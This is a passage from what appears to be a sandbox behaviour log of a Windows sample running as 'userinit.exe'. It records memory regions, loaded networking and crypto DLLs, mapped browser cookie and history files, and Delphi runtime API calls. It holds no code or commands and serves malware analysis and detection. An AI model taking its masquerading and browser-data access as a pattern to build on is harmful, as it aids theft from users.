entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4011
start_va = 0x26a0000
end_va = 0x2746fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 4012
start_va = 0x25f0000
end_va = 0x2698fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4013
start_va = 0x26a0000
end_va = 0x274afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 4014
start_va = 0x25f0000
end_va = 0x269cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4015
start_va = 0x26a0000
end_va = 0x274efff
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 4017
start_va = 0x2750000
end_va = 0x2800fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 4018
start_va = 0x25f0000
end_va = 0x26a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4019
start_va = 0x26b0000
end_va = 0x2764fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 4022
start_va = 0x25f0000
end_va = 0x26a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4023
start_va = 0x26b0000
end_va = 0x2768fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 4024
start_va = 0x25f0000
end_va = 0x26aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4029
start_va = 0x26b0000
end_va = 0x276cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 4030
start_va = 0x25f0000
end_va = 0x26aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4034
start_va = 0x26b0000
end_va = 0x2770fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 4035
start_va = 0x2780000
end_va = 0x2842fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4036
start_va = 0x25f0000
end_va = 0x26b4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4041
start_va = 0x26c0000
end_va = 0x2786fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4042
start_va = 0x25f0000
end_va = 0x26b8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4043
start_va = 0x26c0000
end_va = 0x278afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4047
start_va = 0x25f0000
end_va = 0x26bcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4048
start_va = 0x26c0000
end_va = 0x278efff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4052
start_va = 0x2790000
end_va = 0x2860fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4053
start_va = 0x25f0000
end_va = 0x26c2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4054
start_va = 0x26d0000
end_va = 0x27a4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4058
start_va = 0x25f0000
end_va = 0x26c6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4059
start_va = 0x26d0000
end_va = 0x27a8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4060
start_va = 0x25f0000
end_va = 0x26cafff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4064
start_va = 0x26d0000
end_va = 0x27acfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4065
start_va = 0x25f0000
end_va = 0x26cefff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4069
start_va = 0x26d0000
end_va = 0x27b0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4070
start_va = 0x27c0000
end_va = 0x28a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 4074
start_va = 0x25f0000
end_va = 0x26d4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4075
start_va = 0x26e0000
end_va = 0x27c6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 4079
start_va = 0x25f0000
end_va = 0x26d8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4080
start_va = 0x26e0000
end_va = 0x27cafff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 4084
start_va = 0x25f0000
end_va = 0x26dcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4085
start_va = 0x26e0000
end_va = 0x27cefff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 4088
start_va = 0x27d0000
end_va = 0x28c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 4089
start_va = 0x25f0000
end_va = 0x26e2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4093
start_va = 0x26f0000
end_va = 0x27e4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026f0000"
filename = ""
Region:
id = 4094
start_va = 0x25f0000
end_va = 0x26e6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4097
start_va = 0x26f0000
end_va = 0x27e8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026f0000"
filename = ""
Region:
id = 4098
start_va = 0x25f0000
end_va = 0x26eafff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4101
start_va = 0x26f0000
end_va = 0x27ecfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026f0000"
filename = ""
Region:
id = 4102
start_va = 0x25f0000
end_va = 0x26eefff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4103
start_va = 0x26f0000
end_va = 0x27f0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026f0000"
filename = ""
Region:
id = 4107
start_va = 0x2800000
end_va = 0x2902fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 4110
start_va = 0x25f0000
end_va = 0x26f4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4111
start_va = 0x2700000
end_va = 0x2806fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 4114
start_va = 0x25f0000
end_va = 0x26f8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4115
start_va = 0x2700000
end_va = 0x280afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 4119
start_va = 0x25f0000
end_va = 0x26fcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4120
start_va = 0x2700000
end_va = 0x280ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 4122
start_va = 0x2810000
end_va = 0x2922fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 4123
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4124
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4125
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4126
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4127
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4128
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4129
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 4130
start_va = 0x220000
end_va = 0x220fff
entry_point = 0x220000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 4131
start_va = 0x2930000
end_va = 0x2a2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002930000"
filename = ""
Region:
id = 4132
start_va = 0x230000
end_va = 0x230fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 4133
start_va = 0x6cea0000
end_va = 0x6ceb8fff
entry_point = 0x6cea0000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 4137
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 4138
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 4139
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 4140
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 4142
start_va = 0x2ae0000
end_va = 0x2b1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ae0000"
filename = ""
Region:
id = 4143
start_va = 0x2b50000
end_va = 0x2c4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b50000"
filename = ""
Region:
id = 4144
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 4145
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 4146
start_va = 0x2c50000
end_va = 0x2f1efff
entry_point = 0x2c50000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4149
start_va = 0x240000
end_va = 0x241fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000240000"
filename = ""
Region:
id = 4150
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 4151
start_va = 0x3d0000
end_va = 0x3d0fff
entry_point = 0x3d0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 4152
start_va = 0x3e0000
end_va = 0x3e1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 4153
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4154
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4155
start_va = 0x3d0000
end_va = 0x3d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 4156
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4157
start_va = 0x690000
end_va = 0x6bbfff
entry_point = 0x690000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 4158
start_va = 0x3f0000
end_va = 0x3f7fff
entry_point = 0x3f0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 4159
start_va = 0x6c0000
end_va = 0x6cffff
entry_point = 0x6c0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 4160
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4161
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4162
start_va = 0x2f20000
end_va = 0x304ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f20000"
filename = ""
Region:
id = 4163
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 4164
start_va = 0x3050000
end_va = 0x31dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003050000"
filename = ""
Region:
id = 4165
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4166
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4167
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4168
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4169
start_va = 0x2f20000
end_va = 0x2fdffff
entry_point = 0x2f20000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 4170
start_va = 0x3010000
end_va = 0x304ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003010000"
filename = ""
Thread:
id = 257
os_tid = 0x860
[0127.233] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0127.233] GetKeyboardType (nTypeFlag=0) returned 4
[0127.233] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0127.233] GetStartupInfoA (in: lpStartupInfo=0x6fe54 | out: lpStartupInfo=0x6fe54*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0127.233] GetVersion () returned 0x1db10106
[0127.233] GetVersion () returned 0x1db10106
[0127.233] GetCurrentThreadId () returned 0x860
[0127.233] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x6f950, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0127.233] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6f82b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0127.233] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f940 | out: phkResult=0x6f940*=0x0) returned 0x2
[0127.233] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f940 | out: phkResult=0x6f940*=0x0) returned 0x2
[0127.234] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f940 | out: phkResult=0x6f940*=0x0) returned 0x2
[0127.234] lstrcpynA (in: lpString1=0x6f82b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0127.234] GetThreadLocale () returned 0x409
[0127.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x6f93b, cchData=5 | out: lpLCData="ENU") returned 4
[0127.234] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0127.235] lstrcpynA (in: lpString1=0x6f848, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0127.235] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0127.235] lstrcpynA (in: lpString1=0x6f848, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0127.235] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0127.235] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0127.235] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x263640
[0127.235] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x580000
[0127.235] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x264640
[0127.235] VirtualAlloc (lpAddress=0x580000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x580000
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x6fa74, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x6fa60, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0127.236] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x6fa60, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0127.236] GetVersionExA (in: lpVersionInformation=0x6fdf8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x6fdf8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0127.236] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0127.237] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0127.237] GetThreadLocale () returned 0x409
[0127.237] GetThreadLocale () returned 0x409
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Jan") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="January") returned 8
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Feb") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="February") returned 9
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Mar") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="March") returned 6
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Apr") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="April") returned 6
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="May") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="May") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Jun") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="June") returned 5
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Jul") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="July") returned 5
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Aug") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="August") returned 7
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Sep") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="September") returned 10
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Oct") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="October") returned 8
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Nov") returned 4
